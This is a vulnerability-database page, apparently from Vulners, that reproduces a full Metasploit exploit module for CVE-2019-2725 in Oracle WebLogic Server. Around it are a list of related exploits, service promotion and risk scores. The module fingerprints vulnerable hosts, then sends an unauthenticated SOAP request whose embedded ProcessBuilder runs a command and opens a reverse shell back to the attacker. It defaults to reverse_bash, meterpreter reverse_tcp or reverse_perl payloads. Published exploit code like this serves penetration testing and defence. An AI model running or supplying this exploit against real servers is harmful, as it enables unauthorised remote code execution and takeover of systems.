Vulners
Lucene search
Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 100 |
|---|---|---|---|---|
 | Oracle #Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit #RCE | 1 May 201900:00 | – | zdt |
| Oracle Weblogic Server Deserialization Remote Code Execution Exploit | 7 May 201900:00 | – | zdt |
 | Exploit for Injection in Oracle Agile_Plm | 12 Dec 201903:09 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 29 May 201901:57 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 23 Nov 202513:55 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 24 Jun 201908:33 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 31 Aug 202014:09 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 1 May 201922:25 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 23 Aug 201901:42 | – | githubexploit |
| Exploit for Injection in Oracle Agile_Plm | 28 Apr 201902:18 | – | githubexploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a malicious SOAP request to the interface WLS AsyncResponseService
to execute code on the vulnerable host.
},
'Author' =>
[
'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-2725'],
['CNVD-C', '2019-48814'],
['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
],
[ 'Windows',
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 12
},
'DisclosureDate' => 'Apr 23 2019'))
register_options(
[
Opt::RPORT(7001),
OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(datastore['WSPATH']),
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => {'SOAPAction' => '' }
)
if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
Exploit::CheckCode::Vulnerable
elsif res && res.code != 202
vprint_status("The target returned a non-vulnerable HTTP code")
Exploit::CheckCode::Safe
elsif res.nil?
vprint_status("The target did not respond in an expected way")
Exploit::CheckCode::Unknown
else
vprint_status("The target returned HTTP code: #{res.code}")
vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
Exploit::CheckCode::Unknown
end
end
def exploit
print_status("Generating payload...")
case target.name
when 'Windows'
string0_cmd = 'cmd.exe'
string1_param = '/c'
shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
when 'Unix','Solaris'
string0_cmd = '/bin/bash'
string1_param = '-c'
shell_payload = payload.encoded
end
random_action = rand_text_alphanumeric(20)
random_relates = rand_text_alphanumeric(20)
soap_payload = %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
soap_payload << %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
soap_payload << %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
soap_payload << %Q|<soapenv:Header>|
soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|
soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
soap_payload << %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
soap_payload << %Q|<void class="java.lang.ProcessBuilder">|
soap_payload << %Q|<array class="java.lang.String" length="3">|
soap_payload << %Q|<void index="0">|
soap_payload << %Q|<string>#{string0_cmd}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="1">|
soap_payload << %Q|<string>#{string1_param}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="2">|
soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
#soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|</array>|
soap_payload << %Q|<void method="start"/>|
soap_payload << %Q|</void>|
soap_payload << %Q|</work:WorkContext>|
soap_payload << %Q|</soapenv:Header>|
soap_payload << %Q|<soapenv:Body>|
soap_payload << %Q|<asy:onAsyncDelivery/>|
soap_payload << %Q|</soapenv:Body>|
soap_payload << %Q|</soapenv:Envelope>|
uri = normalize_uri(datastore['WSPATH'])
if uri.nil?
datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
end
print_status("Sending payload...")
begin
res = send_request_cgi(
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml',
'data' => soap_payload,
'headers' => {'SOAPAction' => '' }
)
rescue Errno::ENOTCONN
fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
end
if res.nil?
fail_with(Failure::Unreachable, "No response from host")
elsif res && res.code != 202
fail_with(Failure::UnexpectedReply,"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2019 00:00Current
9High risk
Vulners AI Score9
CVSS 27.5
CVSS 3.19.8
CVSS 37.5
EPSS0.94468
SSVC